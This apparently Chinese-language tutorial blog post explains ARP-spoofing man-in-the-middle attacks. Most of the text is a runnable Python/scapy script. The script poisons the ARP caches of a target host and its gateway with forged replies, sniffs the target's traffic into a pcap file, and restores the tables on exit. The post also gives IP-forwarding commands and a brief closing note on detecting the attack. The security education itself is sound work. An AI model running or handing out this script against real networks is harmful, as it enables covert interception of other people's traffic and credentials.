中间人攻击,像数据结构链表中两节点添加新节点类似,渗透人员利用arp协议,向两端攻击目标不断发起ARP响应报文,以替换目标的mac地址,使原有客户端->服务端(网关等)的请求流程,替换为客户端->中间人->服务端。成功后,渗透人员可以利用中间节点对两端流量自由处理。
一、源代码
# -*- coding: UTF-8 -*-
import os;
import sys;
import threading;
import signal;
from scapy.all import *
interface = "en0";
target_ip = "192.168.1.20";
gateway_ip = "192.168.1.1";
packet_count = 1000;
# conf.iface = interface;
# conf.verb = 0;
print ("发包端口 %s" % interface);
def get_mac(ip_address):
# srp函数(发送和接收数据包,发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac)
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10);
for s,r in responses:
return r[Ether].src;
return None;
gateway_mac = get_mac(gateway_ip);
target_mac = get_mac(target_ip);
if target_mac is None:
print("目标IP不可达");
else:
print("[%s]的mac地址为[%s]" %(target_ip,target_mac));
if gateway_mac is None:
print("网关不可达");
else:
print("[%s]的mac地址为[%s]" %(gateway_ip,gateway_mac));
#恢复
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
print("恢复....");
send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5);
send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5);
os.kill(os.getpid(),signal.SIGINT);
#中间人攻击
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
#网关发给目标主机
poison_target = ARP();
poison_target.op =2;
poison_target.psrc = gateway_ip;
poison_target.pdst = target_ip;
poison_target.hwdst = target_mac;
#目标主机发给网关
poison_gateway = ARP();
poison_gateway.op = 2;
poison_gateway.psrc = target_ip;
poison_gateway.pdst = gateway_ip;
poison_gateway.hwdst = gateway_mac
print("开始实施攻击....");
while True:
try:
send(poison_target);
send(poison_gateway);
time.sleep(2);
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
print("攻击结束....");
return;
poison_thread = threading.Thread(target= poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac));
poison_thread.start();
try:
print("启动抓包程序....");
print("不要忘记开启 IP转发,否则目标IP无法上网。MAC:sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward");
bpf_filter = "ip host %s" % target_ip;
packets = sniff(count= packet_count,filter=bpf_filter,iface=interface); #启动抓包
wrpcap("arpTest.pcap",packets); #写入pcap文件
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac);
sys.exit(0);
当我们启动程序后,通过wireshark抓包,可见1.20与1.1的对应MAC地址已替换成中间人MAC地址
我们可以通过受攻击目标客户端主机 arp -a命令进行查看,网关地址的MAC已为中间人MAC。
当中间人不开启IP转发时,受攻击客户端无法进行网络通讯。
二、说点其它
中间人攻击带来的危害还是非常大的,不过该问题非常容易发现,我们可以从地址冲突、mac地址查看、网络缓慢或中断等多个维度查看、分析便可快速定位问题点。基于ARP协议,我们还可以做很多有趣的事情,下节分享如何基于ARP生成虚假节点,形成动态防御架构。